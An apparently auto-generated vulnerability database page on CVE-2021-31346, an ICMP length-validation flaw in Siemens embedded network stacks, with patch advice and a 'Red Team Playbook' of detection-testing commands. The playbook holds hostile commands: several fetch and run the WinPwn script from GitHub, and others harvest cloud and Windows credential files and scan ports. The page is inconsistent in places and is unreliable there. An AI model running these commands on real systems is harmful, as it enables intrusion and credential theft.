CVE-2021-31346
Overview
This vulnerability is a protocol-level flaw involving improper validation of the ICMP payload length field within the IP header. The affected component is the network stack implementation in Siemens products including Capital Embedded AR Classic 431-422 and related variants. The unchecked total length of the ICMP payload allows malformed packets to be processed without boundary checks, leading to memory handling anomalies.
Vulnerability Description
A vulnerability has been identified in Capital Embedded AR Classic 431-422 (All versions), Capital Embedded AR Classic R20-11 (All versions < V2303), PLUSCONTROL 1st Gen (All versions), SIMOTICS CONNECT 400 (All versions < V0.5.0.0), SIMOTICS CONNECT 400 (All versions < V1.0.0.0). The total length of an ICMP payload (set in the IP header) is unchecked. This may lead to various side effects, including Information Leak and Denial-of-Service conditions, depending on the network buffer organization in memory. (FSMD-2021-0007)
Impact
An unauthenticated attacker with network access can exploit this vulnerability by sending malicious ICMP packets to the affected devices, resulting in potential information disclosure or denial-of-service conditions. The attacker does not require user interaction or elevated privileges (CVSS vector AV:N/AC:L/PR:N/UI:N). This can disrupt operational continuity of industrial control systems relying on these Siemens products, potentially impacting critical infrastructure availability and data confidentiality.
Solution
Siemens has released security advisories SSA-114589, SSA-044112, and SSA-620288 addressing this issue. Affected customers should update to the fixed versions: Capital Embedded AR Classic R20-11 to V2303 or later, SIMOTICS CONNECT 400 to versions V0.5.0.0 or higher, and apply the corresponding patches for PLUSCONTROL 1st Gen and other impacted products as detailed in the advisories. Refer to the Siemens CERT portal for comprehensive patch instructions and mitigation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in several Siemens products, including Capital Embedded AR Classic and SIMOTICS CONNECT 400, which stems from improper validation of the total length of an ICMP payload as specified in the IP header. This oversight can lead to various adverse effects, such as information leakage and denial-of-service (DoS) conditions. The vulnerability arises from the way network buffers are organized in memory, allowing an attacker to manipulate the ICMP packets sent to the affected devices. This lack of validation could enable malicious actors to exploit the flaw to disrupt services or gain unauthorized access to sensitive information.
Attack vectors for this vulnerability are primarily network-based, as it involves the manipulation of ICMP packets. An attacker could craft specially designed packets to exploit the unchecked length field, potentially leading to buffer overflow conditions. This could result in the execution of arbitrary code or the crashing of the affected services, effectively causing a denial-of-service. Furthermore, if the attacker is able to extract information from the system's memory, they could gain insights into the internal workings of the network or access sensitive data, thus posing a significant risk to the confidentiality and integrity of the information processed by these devices.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on the affected Siemens products for critical operations. The potential for service disruption can lead to significant downtime, which in turn can result in financial losses and damage to reputation. For industries such as manufacturing, energy, and healthcare, where these devices are often integrated into operational technology (OT) environments, the consequences of a successful exploitation could extend beyond financial implications to include safety risks and regulatory compliance issues. The high CVSS score of 9.1 underscores the severity of the threat, emphasizing the need for immediate attention and remediation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching affected systems is crucial, as Siemens has released updates to address this issue in various product versions. Network monitoring tools can also be employed to detect unusual ICMP traffic patterns that may indicate an attempted exploitation. Additionally, organizations should consider implementing intrusion detection systems (IDS) that can analyze packet structures and flag anomalies. Conducting thorough risk assessments and penetration testing can further help identify potential weaknesses in the network infrastructure, allowing for proactive measures to be taken.
In conclusion, the vulnerability affecting Siemens products presents a significant threat to organizations that utilize these systems. The potential for exploitation through network-based attacks highlights the importance of robust security practices, including timely updates, continuous monitoring, and comprehensive risk management strategies. By addressing this vulnerability and reinforcing their cybersecurity posture, organizations can mitigate the risks associated with this critical flaw and protect their operational integrity.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Siemens | Capital Vstar | All |
cpe:2.3:a:siemens:capital_vstar:*:*:*:*:*:*:*:*
|
|
|
Siemens | Nucleus Net | All |
cpe:2.3:a:siemens:nucleus_net:*:*:*:*:*:*:*:*
|
|
|
Siemens | Nucleus Readystart V3 | All |
cpe:2.3:a:siemens:nucleus_readystart_v3:*:*:*:*:*:*:*:*
|
|
|
Siemens | Nucleus Readystart V4 | All |
cpe:2.3:a:siemens:nucleus_readystart_v4:*:*:*:*:*:*:*:*
|
|
|
Siemens | Nucleus Source Code | All |
cpe:2.3:a:siemens:nucleus_source_code:*:*:*:*:*:*:*:*
|
|
|
Siemens | Apogee Modular Building Controller Firmware | All |
cpe:2.3:o:siemens:apogee_modular_building_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | Apogee Modular Equiment Controller Firmware | All |
cpe:2.3:o:siemens:apogee_modular_equiment_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | Apogee Pxc Compact Firmware | All |
cpe:2.3:o:siemens:apogee_pxc_compact_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | Apogee Pxc Modular Firmware | All |
cpe:2.3:o:siemens:apogee_pxc_modular_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | Talon Tc Compact Firmware | All |
cpe:2.3:o:siemens:talon_tc_compact_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | Talon Tc Modular Firmware | All |
cpe:2.3:o:siemens:talon_tc_modular_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.